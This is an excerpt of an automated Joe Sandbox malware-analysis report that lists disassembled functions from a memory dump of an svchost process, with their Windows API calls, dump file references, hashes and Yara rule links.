                                                                                                                                                                    • Opcode Fuzzy Hash: 2487f92d6b94e1f8fe7daf521ec0e26ce1a6626155e602586cd1e3c906f4f952
                                                                                                                                                                    • Instruction Fuzzy Hash: 45113C78E08748AFCB40DFA5C484AADFBF5BF49220F1596D5D854AB342E3B09A40CF90
                                                                                                                                                                    Function 03E3A45C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetWindowInfo.USER32(03E3A53E,?), ref: 03E3A46D
                                                                                                                                                                    • GetSystemMetrics.USER32(00000021), ref: 03E3A480
                                                                                                                                                                    • GetSystemMetrics.USER32(00000033), ref: 03E3A49B
                                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 03E3A4A7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: MetricsSystem$InfoWindow
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2832802444-0
                                                                                                                                                                    • Opcode ID: 215f2ad0ab65d35a76683250377d077abb9d391f45812362298032b999570b6a
                                                                                                                                                                    • Instruction ID: 47bc49de90ed04594d7011a49ecd0d5b3dc78756596661c0c458e1276d7dfbc2
                                                                                                                                                                    • Opcode Fuzzy Hash: 215f2ad0ab65d35a76683250377d077abb9d391f45812362298032b999570b6a
                                                                                                                                                                    • Instruction Fuzzy Hash: C5F05475D0130DAFDB40EFE5C94D6DDB7B8AF16250F1053A5A544EF280E6319A84CB51
                                                                                                                                                                    Function 03E39E3C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 03E39C74: LoadLibraryA.KERNEL32(kernel32.dll,?), ref: 03E39CA7
                                                                                                                                                                      • Part of subcall function 03E39C74: GetProcAddress.KERNEL32(76680000,GetProcAddress), ref: 03E39CBC
                                                                                                                                                                      • Part of subcall function 03E39C74: LoadLibraryA.KERNEL32(user32.dll,?), ref: 03E39CD4
                                                                                                                                                                      • Part of subcall function 03E39C74: GetProcAddress.KERNEL32(767A0000,00000000), ref: 03E39CF6
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(03E39DA2,?,?,03E39DA2), ref: 03E39E63
                                                                                                                                                                    • PostMessageA.USER32(?,?,00000000,03E39DA2), ref: 03E39E7B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressLibraryLoadProc$CurrentMessagePostProcess
                                                                                                                                                                    • String ID: PostMessageA
                                                                                                                                                                    • API String ID: 1656095895-3140657398
                                                                                                                                                                    • Opcode ID: d50799e23a21cc18d2e5f0fcfa6d1ae3e6cacaf89010114c09e6911f04f6306b
                                                                                                                                                                    • Instruction ID: d037a2f3ad6bdc812db245db23fed1fc707427996a8da4dd29a116643399cfdf
                                                                                                                                                                    • Opcode Fuzzy Hash: d50799e23a21cc18d2e5f0fcfa6d1ae3e6cacaf89010114c09e6911f04f6306b
                                                                                                                                                                    • Instruction Fuzzy Hash: 93E0C9796053089FCB40EBDAD84CE96B3F9E74A615B142640F544DB252C775A840CB50